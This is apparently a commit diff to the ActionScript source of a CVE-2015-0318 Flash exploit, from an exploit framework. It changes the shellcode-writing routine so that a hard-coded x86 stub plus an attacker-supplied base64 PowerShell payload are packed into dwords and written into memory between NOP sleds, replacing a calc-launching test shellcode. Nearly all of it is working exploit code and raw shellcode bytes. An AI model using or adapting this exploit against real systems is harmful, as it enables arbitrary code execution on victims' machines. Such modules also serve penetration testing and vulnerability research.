This seems to work

Author: wchen-r7

data/exploits/CVE-2015-0318/Main.swf

@@ -406,22 +406,36 @@ package
 
 			return 0;
 		}
+
+
 
 		public function WriteShellcode(v:Vector.<uint>, i:uint, ptr:uint, fun:uint):void {
-			
+			var myshellcode:Array = GetPayload();
 			// at this point we are sandwiched on the stack between the current
 			// frame and the previous frame; this is hazardous, we need to 
 			// shift our stack back above the current frame or things will go 
 			// wrong(tm).
-			
 			v[i++] = 0x1000ec81; // 81ec00100000      sub esp, 0x1000
 			v[i++] = 0x90900000;
 
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			//v[i++] = 0xcccccccc;
+
+			for (var payload_i:int; payload_i < myshellcode.length; payload_i++) {
+				v[i++] = myshellcode[payload_i];
+			}
+
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
+			v[i++] = 0x90909090;
 			//v[i++] = 0xcccccccc;
 
 			// we're using skylined's win32 calc shellcode, the function 
 			// version that saves registers, but without the ret at the end...
-						
+			
+/*						
 			v[i++] = 0x52d23160;
 			v[i++] = 0x6c616368;
 			v[i++] = 0x52e68963;
@@ -442,7 +456,7 @@ package
 			v[i++] = 0xae3c03fe;
 			v[i++] = 0x5858d7ff;
 			v[i++] = 0x90909061;
-			
+	*/
 			// we just put things back how they were; at least, everything 
 			// important. we need esp and ebp to be correct, which is easy;
 			// we need ecx to point to the object's vtable and then we can
@@ -460,17 +474,35 @@ package
 			v[i++] = 0x9090e0ff; // FFE0              jmp eax
 		}
 
-		public function GetPayload():String {
+		public function GetPayload():Array {
 			var b64:Base64Decoder = new Base64Decoder();
-			var p:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
-			b64.decode(p);
-			var payload:String = b64.toByteArray().toString();
-			return payload;
+			var raw_psh_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh;
+			b64.decode(raw_psh_payload);
+			var psh_payload:String = b64.toByteArray().toString();
+			var payload:String = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + psh_payload + "\x00";
+
+			var arr:Array = new Array();
+			for (var d_counter:int = 0; d_counter < payload.length; d_counter+=4) {
+				var dword:String = payload.substring(d_counter, d_counter+4).split("").reverse().join("");
+				var hex:String = "";
+				for (var i2:int = 0; i2 < dword.length; i2++) {
+					var byte:String = dword.charCodeAt(i2).toString(16);
+					if (byte == '0') {
+						byte = "00";
+					} else if (byte.length == 1) {
+						byte = '0' + byte;
+					}
+					hex += byte;
+				}
+				var real_dword:uint = parseInt(hex, 16);
+				arr.push(real_dword);
+			}
+
+			return arr;
 		}
 
-		public function Main() {
-			var payload:String = GetPayload();
 
+		public function Main() {
 			i = 0;
 
 			Initialise();